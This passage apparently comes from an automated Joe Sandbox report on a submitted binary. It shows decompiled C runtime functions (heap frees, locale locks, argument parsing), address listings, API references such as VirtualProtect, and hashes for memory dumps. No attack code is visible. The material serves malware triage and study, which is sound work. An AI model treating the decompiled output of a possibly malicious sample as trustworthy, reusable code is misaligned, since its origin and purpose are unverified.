																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E0041CA88(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E0040D3AF(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E0040D4E4();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E0040D3AF(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x0041a241
0x0041a249
0x0041a24a
0x0041a253
0x0041a25b
0x0041a25d
0x0041a25f
0x0041a262
0x0041a37f
0x0041a382
0x0041a268
0x0041a268
0x0041a269
0x0041a26b
0x0041a26e
0x0041a271
0x0041a274
0x0041a277
0x0041a279
0x0041a27c
0x0041a281
0x0041a28f
0x0041a299
0x0041a29c
0x0041a29f
0x0041a29f
0x0041a2aa
0x0041a2af
0x0041a2b4
0x00000000
0x0041a2ba
0x0041a2bd
0x0041a2bd
0x0041a2c0
0x0041a2c2
0x0041a2c5
0x0041a2c7
0x0041a2c7
0x0041a2c7
0x0041a2ca
0x0041a2ca
0x0041a2ca
0x0041a2d0
0x00000000
0x00000000
0x0041a2d5
0x0041a2ec
0x0041a2ec
0x0041a2d7
0x0041a2d7
0x0041a2df
0x00000000
0x0041a2e1
0x0041a2e1
0x0041a2e4
0x0041a2ea
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a2ea
0x0041a2df
0x0041a2f5
0x0041a2f5
0x0041a2fa
0x0041a2ff
0x0041a303
0x0041a30f
0x0041a312
0x0041a315
0x0041a31f
0x0041a327
0x0041a32f
0x00000000
0x0041a335
0x0041a339
0x0041a384
0x0041a38d
0x0041a390
0x0041a392
0x0041a396
0x0041a39a
0x0041a39f
0x0041a3a4
0x0041a39a
0x0041a3a8
0x0041a3aa
0x0041a3ac
0x0041a3b0
0x0041a3b1
0x0041a3b6
0x0041a3bb
0x0041a3b1
0x0041a3be
0x0041a3c1
0x0041a3c4
0x0041a3c7
0x0041a3ca
0x0041a33b
0x0041a33e
0x0041a341
0x0041a343
0x0041a347
0x0041a34b
0x0041a350
0x0041a355
0x0041a34b
0x0041a35b
0x0041a35d
0x0041a362
0x0041a367
0x0041a36c
0x0041a362
0x0041a36d
0x0041a371
0x0041a374
0x0041a378
0x0041a37b
0x0041a37b
0x00000000
0x0041a37e
0x00000000
0x0041a32f
0x0041a2f0
0x0041a2f2
0x0041a2f2
0x00000000
0x0041a2f2
0x0041a3d1
0x0041a3d2
0x0041a3d3
0x0041a3d4
0x0041a3d5
0x0041a3d6
0x0041a3db
0x0041a3df
0x0041a3e1
0x0041a3e7
0x0041a3ee
0x0041a3f1
0x0041a3f4
0x0041a3f5
0x0041a3f6
0x0041a3f9
0x0041a3fa
0x0041a3fd
0x0041a403
0x0041a405
0x0041a42a
0x0041a434
0x0041a43a
0x0041a43c
0x0041a442
0x0041a444
0x0041a6a4
0x0041a6a5
0x00000000
0x0041a44a
0x0041a44a
0x0041a44e
0x0041a5bc
0x0041a5d9
0x0041a5de
0x0041a5e1
0x0041a5e3
0x0041a5e9
0x0041a5e9
0x0041a5eb
0x0041a5ee
0x0041a5f0
0x0041a5f6
0x0041a5f6
0x0041a5f8
0x0041a67f
0x0041a67f
0x0041a5fe
0x0041a5fe
0x0041a600
0x0041a606
0x0041a609
0x0041a60c
0x0041a612
0x00000000
0x00000000
0x0041a614
0x0041a618
0x0041a641
0x0041a641
0x0041a643
0x0041a61a
0x0041a61a
0x0041a61e
0x0041a622
0x0041a629
0x0041a62f
0x00000000
0x0041a631
0x0041a631
0x0041a634
0x0041a637
0x0041a63f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a63f
0x0041a62f
0x0041a64e
0x0041a64e
0x0041a650
0x0041a67e
0x0041a67e
0x00000000
0x0041a652
0x0041a652
0x0041a658
0x0041a659
0x0041a65a
0x0041a65b
0x0041a660
0x0041a666
0x0041a669
0x0041a66b
0x0041a672
0x0041a674
0x0041a676
0x0041a66d
0x0041a66d
0x0041a66e
0x00000000
0x0041a66e
0x0041a66b
0x00000000
0x0041a650
0x0041a647
0x0041a649
0x0041a64c
0x0041a64c
0x00000000
0x0041a64c
0x0041a685
0x0041a685
0x0041a686
0x0041a689
0x0041a68f
0x0041a68f
0x0041a698
0x0041a69a
0x00000000
0x0041a69c
0x0041a69c
0x0041a69e
0x00000000
0x0041a6a0
0x0041a6a0
0x0041a6a0
0x0041a69e
0x0041a69a
0x00000000
0x0041a454
0x0041a454
0x0041a459
0x00000000
0x0041a45f
0x0041a45f
0x0041a464
0x00000000
0x0041a46a
0x0041a46a
0x0041a470
0x0041a475
0x0041a477
0x0041a47e
0x0041a47f
0x0041a481
0x00000000
0x00000000
0x0041a487
0x0041a487
0x0041a48b
0x0041a491
0x00000000
0x0041a497
0x0041a499
0x0041a49a
0x0041a49d
0x00000000
0x0041a4a3
0x0041a4a3
0x0041a4a9
0x0041a4ae
0x0041a4b8
0x0041a4bc
0x0041a4c1
0x0041a4c4
0x0041a4c6
0x00000000
0x0041a4c8
0x0041a4c8
0x0041a4ca
0x0041a4cd
0x0041a4cd
0x0041a4d0
0x0041a4d3
0x0041a4d3
0x0041a4de
0x0041a4e0
0x0041a4e2
0x00000000
0x00000000
0x0041a4e2
0x00000000
0x0041a4e4
0x0041a4e4
0x0041a4ea
0x0041a4ed
0x0041a4ed
0x0041a4fb
0x0041a504
0x0041a509
0x0041a50f
0x0041a512
0x0041a513
0x0041a515
0x0041a523
0x0041a523
0x0041a52a
0x0041a58b
0x00000000
0x0041a52c
0x0041a52c
0x0041a53a
0x0041a53f
0x0041a542
0x0041a544
0x0041a6bf
0x0041a6c1
0x0041a6c2
0x0041a6c3
0x0041a6c4
0x0041a6c5
0x0041a6c6
0x0041a6cb
0x0041a6ce
0x0041a6cf
0x0041a6d7
0x0041a6de
0x0041a6e1
0x0041a6e2
0x0041a6e5
0x0041a6e9
0x0041a6ea
0x0041a6ed
0x0041a6fd
0x0041a720
0x0041a725
0x0041a728
0x0041a72a
0x0041a9e0
0x0041a9e0
0x0041a9e0
0x00000000
0x0041a730
0x0041a730
0x0041a733
0x0041a733
0x0041a736
0x0041a73c
0x0041a742
0x0041a745
0x0041a747
0x0041a74a
0x0041a751
0x0041a754
0x0041a75a
0x00000000
0x00000000
0x0041a75c
0x0041a760
0x0041a789
0x0041a789
0x0041a762
0x0041a762
0x0041a766
0x0041a76a
0x0041a771
0x0041a777
0x00000000
0x0041a779
0x0041a779
0x0041a77c
0x0041a77f
0x0041a787
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a787
0x0041a777
0x0041a796
0x0041a796
0x0041a798
0x0041a7a1
0x0041a7a7
0x0041a7aa
0x0041a7aa
0x0041a7ad
0x0041a7b0
0x0041a7b0
0x0041a7c0
0x0041a7ce
0x0041a7d3
0x0041a7da
0x0041a7dc
0x00000000
0x0041a7e2
0x0041a7e8
0x0041a7f5
0x0041a7fe
0x0041a804
0x0041a811
0x0041a818
0x0041a81d
0x0041a820
0x0041a822
0x0041aa60
0x0041aa66
0x0041aa67
0x0041aa68
0x0041aa69
0x0041aa6a
0x0041aa6b
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa77
0x0041aa89
0x0041aa8e
0x0041aa90
0x0041aa99
0x00000000
0x0041aa99
0x0041aa92
0x0041aa95
0x0041aa97
0x00000000
0x00000000
0x0041aa9f
0x0041a828
0x0041a828
0x0041a836
0x0041a839
0x0041a84f
0x0041a856
0x0041a85b
0x0041a83b
0x0041a83b
0x0041a843
0x00000000
0x0041a845
0x0041a845
0x0041a84b
0x0041a84b
0x0041a843
0x0041a862
0x0041a869
0x0041a86c
0x0041a96a
0x0041a96d
0x0041a97a
0x0041a97d
0x0041a985
0x0041a985
0x0041a96f
0x0041a975
0x0041a975
0x0041a872
0x0041a872
0x0041a87e
0x0041a884
0x0041a88a
0x0041a88d
0x0041a893
0x0041a896
0x0041a899
0x00000000
0x00000000
0x0041a89b
0x0041a8a4
0x0041a8a8
0x0041a8b1
0x0041a8b5
0x0041a8b6
0x0041a8bc
0x0041a8c2
0x0041a8c8
0x0041a8cb
0x00000000
0x00000000
0x0041a8cd
0x0041a8ec
0x0041a8ec
0x0041a8ef
0x0041a90c
0x0041a911
0x0041a914
0x0041a916
0x0041a954
0x0041a918
0x0041a918
0x0041a91e
0x0041a923
0x0041a92b
0x0041a92c
0x0041a92c
0x0041a943
0x0041a94a
0x0041a94d
0x0041a94f
0x0041a94f
0x0041a95a
0x0041a960
0x0041a960
0x0041a965
0x00000000
0x0041a965
0x0041a8cf
0x0041a8d1
0x0041a8d6
0x0041a8dc
0x0041a8e5
0x0041a8e8
0x0041a8e8
0x00000000
0x0041a8d1
0x0041a988
0x0041a988
0x0041a98c
0x0041a994
0x0041a99a
0x0041a99d
0x0041a9a3
0x0041a9a5
0x0041a9f1
0x0041a9f7
0x0041aa43
0x0041aa43
0x0041a9f9
0x0041a9fe
0x0041a9fe
0x0041aa04
0x0041aa08
0x00000000
0x0041aa0a
0x0041aa0e
0x0041aa17
0x0041aa23
0x0041aa28
0x0041aa31
0x0041aa37
0x0041aa3a
0x0041aa3a
0x0041aa08
0x0041aa49
0x0041aa51
0x0041aa57
0x0041aa5a
0x0041a9a7
0x0041a9ad
0x0041a9b7
0x0041a9c9
0x0041a9d0
0x0041a9dd
0x00000000
0x0041a9dd
0x00000000
0x0041a9a5
0x0041a822
0x0041a79a
0x0041a79a
0x0041a9e2
0x0041a9e5
0x0041a9e6
0x0041a9e7
0x0041a9e9
0x0041a9f0
0x0041a9f0
0x00000000
0x0041a798
0x0041a791
0x0041a793
0x0041a793
0x00000000
0x0041a793
0x0041a54a
0x0041a54a
0x0041a54d
0x0041a552
0x0041a6ba
0x00000000
0x0041a558
0x0041a55a
0x0041a562
0x0041a568
0x0041a569
0x0041a56f
0x0041a570
0x0041a575
0x0041a57b
0x0041a57e
0x0041a580
0x0041a582
0x0041a583
0x0041a583
0x0041a591
0x0041a591
0x0041a594
0x0041a597
0x0041a599
0x0041a59c
0x0041a59e
0x0041a59e
0x0041a5a1
0x0041a5a1
0x0041a5a4
0x0041a5a7
0x00000000
0x0041a5ad
0x0041a5ad
0x0041a5af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a5af
0x0041a5a7
0x0041a552
0x0041a544
0x0041a517
0x0041a519
0x0041a51a
0x0041a51d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a51d
0x0041a515
0x0041a49d
0x00000000
0x0041a491
0x0041a5b5
0x00000000
0x0041a5b5
0x0041a464
0x0041a459
0x0041a44e
0x0041a407
0x0041a407
0x0041a409
0x0041a420
0x0041a40b
0x0041a40b
0x0041a40c
0x0041a40d
0x0041a40e
0x0041a413
0x0041a6ab
0x0041a6ae
0x0041a6af
0x0041a6b0
0x0041a6b2
0x0041a6b9
0x0041a6b9
0x0041a405
0x00000000

APIs

Part of subcall function 0041D4FF: HeapAlloc.KERNEL32(00000000,?,?,?,0040E78B,?,?,?,?,?,00401113,?,?), ref: 0041D531

_free.LIBCMT ref: 0041A350
_free.LIBCMT ref: 0041A367
_free.LIBCMT ref: 0041A384
_free.LIBCMT ref: 0041A39F
_free.LIBCMT ref: 0041A3B6

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 597896fe3d20792f349dce9694885ca5c9db543bff8f6592612abd38fc050d8c
Instruction ID: 32311f126007dd7bf2884779134f9458bd310ef36807b0842916abce9d5c8807
Opcode Fuzzy Hash: 597896fe3d20792f349dce9694885ca5c9db543bff8f6592612abd38fc050d8c
Instruction Fuzzy Hash: B1510332A01308AFDB21DF6ADC41BAA73F4EF58724B54056FE809D7350E739E9918B49

Uniqueness

Uniqueness Score: -1.00%

Function 0083A4A8 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083D766: RtlAllocateHeap.NTDLL(00000000,?), ref: 0083D798

_free.LIBCMT ref: 0083A5B7
_free.LIBCMT ref: 0083A5CE
_free.LIBCMT ref: 0083A5EB
_free.LIBCMT ref: 0083A606
_free.LIBCMT ref: 0083A61D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 597896fe3d20792f349dce9694885ca5c9db543bff8f6592612abd38fc050d8c
Instruction ID: b155fafe02cfad38ba238039fe6644db717c41f2093a5e1aecc5d82c663848b8
Opcode Fuzzy Hash: 597896fe3d20792f349dce9694885ca5c9db543bff8f6592612abd38fc050d8c
Instruction Fuzzy Hash: 6F51C132A00204AFDB28DF69CC42B6A77F4FF98720F544569E889D7290E735DA01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00822747 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,00000000,?,?,?,00822F6D), ref: 008227EF
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00822F6D), ref: 00822804
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00822F6D), ref: 00822812
LocalAlloc.KERNEL32(00000040,?,?,?,00822F6D), ref: 0082282D
OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00822F6D), ref: 0082284C

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
String ID:
API String ID: 2509773233-0
Opcode ID: b081a5a94f84d8f4ae7bbe74b47554b6f7b4d40ee931c667c493b5dddc45e88e
Instruction ID: e4022348c24099b4f09e345665b25e2aa7bc181ad3d4262adde51e3b7307be87
Opcode Fuzzy Hash: b081a5a94f84d8f4ae7bbe74b47554b6f7b4d40ee931c667c493b5dddc45e88e
Instruction Fuzzy Hash: 0731F472B00114BFDB149FA8EC84FAEB768FF48710F4541A9E905DB251DB31AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2E0 Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B2E0(intOrPtr __edx, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				intOrPtr* _v28;
				char _v32;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				intOrPtr _t43;
				void* _t48;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t66;
				signed int _t74;
				void* _t75;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t79;
				signed int _t80;
				void* _t86;

				_t72 = __edx;
				_push(0xffffffff);
				_push(0x42b2d4);
				_push( *[fs:0x0]);
				_t35 =  *0x43b054; // 0x41d6575c
				_t36 = _t35 ^ _t80;
				_v20 = _t36;
				_push(_t36);
				 *[fs:0x0] =  &_v16;
				_t77 = _a4;
				_v28 = _t77;
				E0040C893( &_v32, 0);
				_v8 = 0;
				_t74 =  *0x43ce48; // 0x0
				_t56 =  *0x43cd0c; // 0x0
				if(_t74 == 0) {
					E0040C893( &_v24, _t74);
					_t86 =  *0x43ce48 - _t74; // 0x0
					if(_t86 == 0) {
						_t53 =  *0x43c098; // 0x1
						_t54 = _t53 + 1;
						 *0x43c098 = _t54;
						 *0x43ce48 = _t54;
					}
					E0040C8EB( &_v24);
					_t74 =  *0x43ce48; // 0x0
				}
				_t59 =  *((intOrPtr*)(_t77 + 4));
				if(_t74 >=  *((intOrPtr*)(_t59 + 0xc))) {
					_t78 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t59 + 0x14)) == 0) {
						L11:
						if(_t78 != 0) {
							L19:
							E0040C8EB( &_v32);
							 *[fs:0x0] = _v16;
							_pop(_t75);
							_pop(_t79);
							_pop(_t57);
							return E0040D3AF(_t78, _t57, _v20 ^ _t80, _t72, _t75, _t79);
						}
						L12:
						if(_t56 == 0) {
							_t78 = E0040D5BF(_t74, _t78, __eflags, 8);
							_v24 = _t78;
							_v8 = 1;
							_t66 =  *((intOrPtr*)(_v28 + 4));
							__eflags = _t66;
							if(_t66 == 0) {
								_t43 = 0x4379e7;
							} else {
								_t43 =  *((intOrPtr*)(_t66 + 0x18));
								__eflags = _t43;
								if(_t43 == 0) {
									_t43 = _t66 + 0x1c;
								}
							}
							E004037F0(_t43);
							 *((intOrPtr*)(_t78 + 4)) = 0;
							 *_t78 = 0x42cf14;
							E004038A0( &_v84);
							_v28 = _t78;
							_v8 = 2;
							E0040CA44(__eflags, _t78);
							_t72 =  *_t78;
							 *((intOrPtr*)( *_t78 + 4))();
							 *0x43cd0c = _t78;
						} else {
							_t78 = _t56;
						}
						goto L19;
					}
					_t48 = E0040CA70();
					if(_t74 >=  *((intOrPtr*)(_t48 + 0xc))) {
						goto L12;
					}
					_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + _t74 * 4));
					goto L11;
				}
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 8)) + _t74 * 4));
				if(_t78 != 0) {
					goto L19;
				}
				goto L8;
			}

0x0040b2e0
0x0040b2e3
0x0040b2e5
0x0040b2f0
0x0040b2f4
0x0040b2f9
0x0040b2fb
0x0040b301
0x0040b305
0x0040b30b
0x0040b313
0x0040b316
0x0040b31b
0x0040b322
0x0040b328
0x0040b330
0x0040b336
0x0040b33b
0x0040b341
0x0040b343
0x0040b348
0x0040b349
0x0040b34e
0x0040b34e
0x0040b356
0x0040b35b
0x0040b35b
0x0040b361
0x0040b367
0x0040b379
0x0040b379
0x0040b37b
0x0040b37f
0x0040b391
0x0040b393
0x0040b406
0x0040b409
0x0040b413
0x0040b41b
0x0040b41c
0x0040b41d
0x0040b42b
0x0040b42b
0x0040b395
0x0040b397
0x0040b3a4
0x0040b3a9
0x0040b3ac
0x0040b3b3
0x0040b3b6
0x0040b3b8
0x0040b3c6
0x0040b3ba
0x0040b3ba
0x0040b3bd
0x0040b3bf
0x0040b3c1
0x0040b3c1
0x0040b3bf
0x0040b3cf
0x0040b3d7
0x0040b3de
0x0040b3e4
0x0040b3e9
0x0040b3ed
0x0040b3f1
0x0040b3f6
0x0040b3fd
0x0040b400
0x0040b399
0x0040b399
0x0040b399
0x00000000
0x0040b397
0x0040b381
0x0040b389
0x00000000
0x00000000
0x0040b38e
0x00000000
0x0040b38e
0x0040b36c
0x0040b371
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B316
std::_Lockit::_Lockit.LIBCPMT ref: 0040B336
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B356
std::_Facet_Register.LIBCPMT ref: 0040B3F1
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B409

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 27a2cb42cd30e4c7bfa284586484182bedf89f5584a3442a3d818d1f2bc5fd12
Instruction ID: 00ef99cfd3f4ab98c82667ae69455f61b7e91bcd6e9343eb0ca0852e1e25786c
Opcode Fuzzy Hash: 27a2cb42cd30e4c7bfa284586484182bedf89f5584a3442a3d818d1f2bc5fd12
Instruction Fuzzy Hash: FE418D72A00214CBCB25DF95D881B6EB7B4EF44714F24817EE806BB391D738A905CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 004242B6 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004242B6(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x43b160; // 0x43b1b4
					if(_t23 != 0) {
						E0041CA88(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x43b164; // 0x43c784
					if(_t24 != 0) {
						E0041CA88(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x43b168; // 0x43c784
					if(_t25 != 0) {
						E0041CA88(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x43b190; // 0x43b1b8
					if(_t26 != 0) {
						E0041CA88(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x43b194; // 0x43c788
					if(_t27 != 0) {
						return E0041CA88(_t6);
					}
				}
				return _t6;
			}

0x004242bc
0x004242c1
0x004242c5
0x004242cb
0x004242ce
0x004242d3
0x004242d7
0x004242dd
0x004242e0
0x004242e5
0x004242e9
0x004242ef
0x004242f2
0x004242f7
0x004242fb
0x00424301
0x00424304
0x00424309
0x0042430a
0x0042430d
0x00424313
0x00000000
0x0042431b
0x00424313
0x0042431e

APIs

_free.LIBCMT ref: 004242CE

Part of subcall function 0041CA88: HeapFree.KERNEL32(00000000,00000000,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?), ref: 0041CA9E
Part of subcall function 0041CA88: GetLastError.KERNEL32(?,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?,?), ref: 0041CAB0

_free.LIBCMT ref: 004242E0
_free.LIBCMT ref: 004242F2
_free.LIBCMT ref: 00424304
_free.LIBCMT ref: 00424316

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: eceb149c231da702bd74202be6d852e9c2ebe9940a9a3a5e164900625310142a
Instruction ID: 2b42f25c5f800a17bc84ae5ad55ace582fa585dc4d74384700300b72a8b59e64
Opcode Fuzzy Hash: eceb149c231da702bd74202be6d852e9c2ebe9940a9a3a5e164900625310142a
Instruction Fuzzy Hash: 3EF06832B84218A78521EB65F8C5E4773DDEE507953D5190BF508D7611CB38FC8087AC

Uniqueness

Uniqueness Score: -1.00%

Function 0084451D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00844535

Part of subcall function 0083CCEF: HeapFree.KERNEL32(00000000,00000000,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?), ref: 0083CD05
Part of subcall function 0083CCEF: GetLastError.KERNEL32(?,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?,?), ref: 0083CD17

_free.LIBCMT ref: 00844547
_free.LIBCMT ref: 00844559
_free.LIBCMT ref: 0084456B
_free.LIBCMT ref: 0084457D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: eceb149c231da702bd74202be6d852e9c2ebe9940a9a3a5e164900625310142a
Instruction ID: 8a8c60719648b7fcdedec52d44b63aec9f6939aeed91256440f64681d14bc2c6
Opcode Fuzzy Hash: eceb149c231da702bd74202be6d852e9c2ebe9940a9a3a5e164900625310142a
Instruction Fuzzy Hash: 7CF01D32504208ABCE20EF68F996E1A77D9FB41791B653815F50CE7515CB30FD808BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00418ABD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00418ABD(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00423053(_t48);
						E00422A9A(_t48, _t57, 0, 0x43c790, 0, 0x43c790, 0x104);
						_t26 =  *0x43ccd8; // 0x553370
						 *0x43ccc8 = 0x43c790;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x43c790;
							_v20 = 0x43c790;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00418D67(E00418BF3( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00418BF3( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E004229C8(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x43cccc = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x43ccd0 = _t58;
											L18:
											E0041CA88(_t37);
											_v12 = 0;
											L19:
											E0041CA88(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x43cccc = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x43ccd0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00411DE1(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00411DE1(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00411D07();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00418abd
0x00418ac6
0x00418acb
0x00418ad5
0x00418ad8
0x00418af5
0x00418af6
0x00418b09
0x00418b0e
0x00418b16
0x00418b1c
0x00418b1f
0x00418b21
0x00418b28
0x00418b28
0x00418b2a
0x00418b2d
0x00418b30
0x00418b37
0x00418b50
0x00418b55
0x00418b57
0x00418b78
0x00418b80
0x00418b83
0x00418b9e
0x00418ba1
0x00418ba8
0x00418bac
0x00418bae
0x00418bb5
0x00418bb8
0x00418bba
0x00418bbc
0x00418bbe
0x00418bc8
0x00418bc8
0x00418bca
0x00418bd0
0x00418bd3
0x00418bd5
0x00418bdb
0x00418bdc
0x00418be2
0x00418be5
0x00418be6
0x00418bec
